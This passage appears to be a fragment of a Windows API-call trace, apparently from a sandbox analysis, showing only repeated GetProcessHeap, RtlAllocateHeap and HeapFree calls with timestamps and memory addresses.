0xe30000 [0069.746] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e068 [0069.746] GetProcessHeap () returned 0xe30000 [0069.746] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e068 | out: hHeap=0xe30000) returned 1 [0069.746] GetProcessHeap () returned 0xe30000 [0069.746] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9db58 [0069.746] GetProcessHeap () returned 0xe30000 [0069.746] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9db58 | out: hHeap=0xe30000) returned 1 [0069.746] GetProcessHeap () returned 0xe30000 [0069.746] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d9a8 [0069.746] GetProcessHeap () returned 0xe30000 [0069.746] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d9a8 | out: hHeap=0xe30000) returned 1 [0069.746] GetProcessHeap () returned 0xe30000 [0069.746] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e218 [0069.746] GetProcessHeap () returned 0xe30000 [0069.746] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e218 | out: hHeap=0xe30000) returned 1 [0069.746] GetProcessHeap () returned 0xe30000 [0069.746] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e458 [0069.746] GetProcessHeap () returned 0xe30000 [0069.746] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e458 | out: hHeap=0xe30000) returned 1 [0069.746] GetProcessHeap () returned 0xe30000 [0069.746] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0069.746] GetProcessHeap () returned 0xe30000 [0069.746] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0069.746] GetProcessHeap () returned 0xe30000 [0069.746] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dc78 [0069.746] GetProcessHeap () returned 0xe30000 [0069.746] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dc78 | out: hHeap=0xe30000) returned 1 [0069.746] GetProcessHeap () returned 0xe30000 [0069.746] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0069.746] GetProcessHeap () returned 0xe30000 [0069.747] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0069.747] GetProcessHeap () returned 0xe30000 [0069.747] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d9a8 [0069.747] GetProcessHeap () returned 0xe30000 [0069.747] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d9a8 | out: hHeap=0xe30000) returned 1 [0069.747] GetProcessHeap () returned 0xe30000 [0069.747] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e2a8 [0069.747] GetProcessHeap () returned 0xe30000 [0069.747] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e2a8 | out: hHeap=0xe30000) returned 1 [0069.747] GetProcessHeap () returned 0xe30000 [0069.747] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dbe8 [0069.747] GetProcessHeap () returned 0xe30000 [0069.747] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dbe8 | out: hHeap=0xe30000) returned 1 [0069.747] GetProcessHeap () returned 0xe30000 [0069.747] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0069.747] GetProcessHeap () returned 0xe30000 [0069.747] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0069.747] GetProcessHeap () returned 0xe30000 [0069.747] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d888 [0069.747] GetProcessHeap () returned 0xe30000 [0069.747] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d888 | out: hHeap=0xe30000) returned 1 [0069.747] GetProcessHeap () returned 0xe30000 [0069.747] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0069.747] GetProcessHeap () returned 0xe30000 [0069.747] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0069.747] GetProcessHeap () returned 0xe30000 [0069.747] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e068 [0069.747] GetProcessHeap () returned 0xe30000 [0069.747] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e068 | out: hHeap=0xe30000) returned 1 [0069.747] GetProcessHeap () returned 0xe30000 [0069.747] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0069.747] GetProcessHeap () returned 0xe30000 [0069.747] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0069.747] GetProcessHeap () returned 0xe30000 [0069.747] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0069.747] GetProcessHeap () returned 0xe30000 [0069.747] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0069.747] GetProcessHeap () returned 0xe30000 [0069.747] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0069.747] GetProcessHeap () returned 0xe30000 [0069.747] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0069.748] GetProcessHeap () returned 0xe30000 [0069.748] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0069.748] GetProcessHeap () returned 0xe30000 [0069.748] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0069.748] GetProcessHeap () returned 0xe30000 [0069.748] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0069.748] GetProcessHeap () returned 0xe30000 [0069.748] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0069.748] GetProcessHeap () returned 0xe30000 [0069.748] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9de28 [0069.748] GetProcessHeap () returned 0xe30000 [0069.748] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9de28 | out: hHeap=0xe30000) returned 1 [0069.748] GetProcessHeap () returned 0xe30000 [0069.748] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dbe8 [0069.748] GetProcessHeap () returned 0xe30000 [0069.748] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dbe8 | out: hHeap=0xe30000) returned 1 [0069.748] GetProcessHeap () returned 0xe30000 [0069.748] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dbe8 [0069.748] GetProcessHeap () returned 0xe30000 [0069.748] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dbe8 | out: hHeap=0xe30000) returned 1 [0069.748] GetProcessHeap () returned 0xe30000 [0069.748] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0069.748] GetProcessHeap () returned 0xe30000 [0069.748] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0069.748] GetProcessHeap () returned 0xe30000 [0069.748] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dc78 [0069.748] GetProcessHeap () returned 0xe30000 [0069.748] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dc78 | out: hHeap=0xe30000) returned 1 [0069.748] GetProcessHeap () returned 0xe30000 [0069.748] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0069.748] GetProcessHeap () returned 0xe30000 [0069.748] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0069.748] GetProcessHeap () returned 0xe30000 [0069.748] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0069.748] GetProcessHeap () returned 0xe30000 [0069.748] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0069.748] GetProcessHeap () returned 0xe30000 [0069.748] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9db58 [0069.748] GetProcessHeap () returned 0xe30000 [0069.748] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9db58 | out: hHeap=0xe30000) returned 1 [0069.748] GetProcessHeap () returned 0xe30000 [0069.748] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e578 [0069.749] GetProcessHeap () returned 0xe30000 [0069.749] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e578 | out: hHeap=0xe30000) returned 1 [0069.749] GetProcessHeap () returned 0xe30000 [0069.749] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9de28 [0069.749] GetProcessHeap () returned 0xe30000 [0069.749] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9de28 | out: hHeap=0xe30000) returned 1 [0069.749] GetProcessHeap () returned 0xe30000 [0069.749] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0069.749] GetProcessHeap () returned 0xe30000 [0069.749] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0069.749] GetProcessHeap () returned 0xe30000 [0069.749] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e218 [0069.749] GetProcessHeap () returned 0xe30000 [0069.749] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e218 | out: hHeap=0xe30000) returned 1 [0069.749] GetProcessHeap () returned 0xe30000 [0069.749] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9deb8 [0069.749] GetProcessHeap () returned 0xe30000 [0069.749] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9deb8 | out: hHeap=0xe30000) returned 1 [0069.749] GetProcessHeap () returned 0xe30000 [0069.749] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0069.749] GetProcessHeap () returned 0xe30000 [0069.749] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0069.749] GetProcessHeap () returned 0xe30000 [0069.749] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e0f8 [0069.749] GetProcessHeap () returned 0xe30000 [0069.749] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e0f8 | out: hHeap=0xe30000) returned 1 [0069.749] GetProcessHeap () returned 0xe30000 [0069.749] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e458 [0069.749] GetProcessHeap () returned 0xe30000 [0069.749] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e458 | out: hHeap=0xe30000) returned 1 [0069.749] GetProcessHeap () returned 0xe30000 [0069.749] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0069.749] GetProcessHeap () returned 0xe30000 [0069.749] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0069.749] GetProcessHeap () returned 0xe30000 [0069.749] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0069.749] GetProcessHeap () returned 0xe30000 [0069.749] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0069.749] GetProcessHeap () returned 0xe30000 [0069.749] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0069.749] GetProcessHeap () returned 0xe30000 [0069.749] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0069.750] GetProcessHeap () returned 0xe30000 [0069.750] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e068 [0069.750] GetProcessHeap () returned 0xe30000 [0069.750] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e068 | out: hHeap=0xe30000) returned 1 [0069.750] GetProcessHeap () returned 0xe30000 [0069.750] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e068 [0069.750] GetProcessHeap () returned 0xe30000 [0069.750] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e068 | out: hHeap=0xe30000) returned 1 [0069.750] GetProcessHeap () returned 0xe30000 [0069.750] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0069.750] GetProcessHeap () returned 0xe30000 [0069.750] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0069.750] GetProcessHeap () returned 0xe30000 [0069.750] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e578 [0069.750] GetProcessHeap () returned 0xe30000 [0069.750] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e578 | out: hHeap=0xe30000) returned 1 [0069.750] GetProcessHeap () returned 0xe30000 [0069.750] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9db58 [0069.750] GetProcessHeap () returned 0xe30000 [0069.750] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9db58 | out: hHeap=0xe30000) returned 1 [0069.750] GetProcessHeap () returned 0xe30000 [0069.750] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0069.750] GetProcessHeap () returned 0xe30000 [0069.750] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0069.750] GetProcessHeap () returned 0xe30000 [0069.750] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e458 [0069.750] GetProcessHeap () returned 0xe30000 [0069.750] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e458 | out: hHeap=0xe30000) returned 1 [0069.750] GetProcessHeap () returned 0xe30000 [0069.750] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9db58 [0069.750] GetProcessHeap () returned 0xe30000 [0069.750] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9db58 | out: hHeap=0xe30000) returned 1 [0069.750] GetProcessHeap () returned 0xe30000 [0069.750] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dbe8 [0069.750] GetProcessHeap () returned 0xe30000 [0069.750] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dbe8 | out: hHeap=0xe30000) returned 1 [0069.750] GetProcessHeap () returned 0xe30000 [0069.750] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e2a8 [0069.750] GetProcessHeap () returned 0xe30000 [0069.750] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e2a8 | out: hHeap=0xe30000) returned 1 [0069.750] GetProcessHeap () returned 0xe30000 [0069.750] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0069.751] GetProcessHeap () returned 0xe30000 [0069.751] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0069.751] GetProcessHeap () returned 0xe30000 [0069.751] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dc78 [0069.751] GetProcessHeap () returned 0xe30000 [0069.751] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dc78 | out: hHeap=0xe30000) returned 1 [0069.751] GetProcessHeap () returned 0xe30000 [0069.751] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e458 [0069.751] GetProcessHeap () returned 0xe30000 [0069.751] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e458 | out: hHeap=0xe30000) returned 1 [0069.751] GetProcessHeap () returned 0xe30000 [0069.751] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9db58 [0069.751] GetProcessHeap () returned 0xe30000 [0069.751] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9db58 | out: hHeap=0xe30000) returned 1 [0069.751] GetProcessHeap () returned 0xe30000 [0069.751] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e7b8 [0069.751] GetProcessHeap () returned 0xe30000 [0069.751] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e7b8 | out: hHeap=0xe30000) returned 1 [0069.751] GetProcessHeap () returned 0xe30000 [0069.751] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0069.751] GetProcessHeap () returned 0xe30000 [0069.751] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0069.751] GetProcessHeap () returned 0xe30000 [0069.751] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e458 [0069.751] GetProcessHeap () returned 0xe30000 [0069.751] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e458 | out: hHeap=0xe30000) returned 1 [0069.751] GetProcessHeap () returned 0xe30000 [0069.751] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0069.751] GetProcessHeap () returned 0xe30000 [0069.751] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0069.751] GetProcessHeap () returned 0xe30000 [0069.751] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d888 [0069.751] GetProcessHeap () returned 0xe30000 [0069.751] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d888 | out: hHeap=0xe30000) returned 1 [0069.751] GetProcessHeap () returned 0xe30000 [0069.751] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e4e8 [0069.751] GetProcessHeap () returned 0xe30000 [0069.751] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e4e8 | out: hHeap=0xe30000) returned 1 [0069.751] GetProcessHeap () returned 0xe30000 [0069.751] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0069.751] GetProcessHeap () returned 0xe30000 [0069.751] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0069.752] GetProcessHeap () returned 0xe30000 [0069.752] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d888 [0069.752] GetProcessHeap () returned 0xe30000 [0069.752] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d888 | out: hHeap=0xe30000) returned 1 [0069.752] GetProcessHeap () returned 0xe30000 [0069.752] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0069.752] GetProcessHeap () returned 0xe30000 [0069.752] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0069.752] GetProcessHeap () returned 0xe30000 [0069.752] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9de28 [0069.752] GetProcessHeap () returned 0xe30000 [0069.752] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9de28 | out: hHeap=0xe30000) returned 1 [0069.752] GetProcessHeap () returned 0xe30000 [0069.752] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0069.752] GetProcessHeap () returned 0xe30000 [0069.752] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0069.752] GetProcessHeap () returned 0xe30000 [0069.752] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0069.752] GetProcessHeap () returned 0xe30000 [0069.752] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0069.752] GetProcessHeap () returned 0xe30000 [0069.752] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dfd8 [0069.752] GetProcessHeap () returned 0xe30000 [0069.752] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dfd8 | out: hHeap=0xe30000) returned 1 [0069.752] GetProcessHeap () returned 0xe30000 [0069.752] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0069.752] GetProcessHeap () returned 0xe30000 [0069.752] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0069.752] GetProcessHeap () returned 0xe30000 [0069.752] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0069.752] GetProcessHeap () returned 0xe30000 [0069.752] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0069.752] GetProcessHeap () returned 0xe30000 [0069.752] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0069.752] GetProcessHeap () returned 0xe30000 [0069.752] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0069.752] GetProcessHeap () returned 0xe30000 [0069.752] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0069.752] GetProcessHeap () returned 0xe30000 [0069.753] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0069.753] GetProcessHeap () returned 0xe30000 [0069.753] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9deb8 [0069.753] GetProcessHeap () returned 0xe30000 [0069.753] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9deb8 | out: hHeap=0xe30000) returned 1 [0069.753] GetProcessHeap () returned 0xe30000 [0069.753] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0069.753] GetProcessHeap () returned 0xe30000 [0069.753] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0069.753] GetProcessHeap () returned 0xe30000 [0069.753] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e578 [0069.753] GetProcessHeap () returned 0xe30000 [0069.753] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e578 | out: hHeap=0xe30000) returned 1 [0069.753] GetProcessHeap () returned 0xe30000 [0069.753] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0069.753] GetProcessHeap () returned 0xe30000 [0069.753] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0069.753] GetProcessHeap () returned 0xe30000 [0069.753] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0069.753] GetProcessHeap () returned 0xe30000 [0069.753] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0069.753] GetProcessHeap () returned 0xe30000 [0069.753] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0069.753] GetProcessHeap () returned 0xe30000 [0069.753] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0069.753] GetProcessHeap () returned 0xe30000 [0069.753] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0069.753] GetProcessHeap () returned 0xe30000 [0069.753] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0069.753] GetProcessHeap () returned 0xe30000 [0069.753] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dbe8 [0069.753] GetProcessHeap () returned 0xe30000 [0069.753] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dbe8 | out: hHeap=0xe30000) returned 1 [0069.753] GetProcessHeap () returned 0xe30000 [0069.753] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d888 [0069.753] GetProcessHeap () returned 0xe30000 [0069.753] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d888 | out: hHeap=0xe30000) returned 1 [0069.753] GetProcessHeap () returned 0xe30000 [0069.753] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0069.753] GetProcessHeap () returned 0xe30000 [0069.753] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0069.754] GetProcessHeap () returned 0xe30000 [0069.754] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0069.754] GetProcessHeap () returned 0xe30000 [0069.754] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0069.754] GetProcessHeap () returned 0xe30000 [0069.754] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e0f8 [0069.754] GetProcessHeap () returned 0xe30000 [0069.754] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e0f8 | out: hHeap=0xe30000) returned 1 [0069.754] GetProcessHeap () returned 0xe30000 [0069.754] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0069.754] GetProcessHeap () returned 0xe30000 [0069.754] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0069.754] GetProcessHeap () returned 0xe30000 [0069.754] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e2a8 [0069.754] GetProcessHeap () returned 0xe30000 [0069.754] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e2a8 | out: hHeap=0xe30000) returned 1 [0069.754] GetProcessHeap () returned 0xe30000 [0069.754] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dc78 [0069.754] GetProcessHeap () returned 0xe30000 [0069.754] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dc78 | out: hHeap=0xe30000) returned 1 [0069.754] GetProcessHeap () returned 0xe30000 [0069.754] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e218 [0069.754] GetProcessHeap () returned 0xe30000 [0069.754] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e218 | out: hHeap=0xe30000) returned 1 [0069.754] GetProcessHeap () returned 0xe30000 [0069.754] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0069.754] GetProcessHeap () returned 0xe30000 [0069.754] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0069.754] GetProcessHeap () returned 0xe30000 [0069.754] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9de28 [0069.755] GetProcessHeap () returned 0xe30000 [0069.755] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9de28 | out: hHeap=0xe30000) returned 1 [0069.755] GetProcessHeap () returned 0xe30000 [0069.755] RtlAllocateHeap 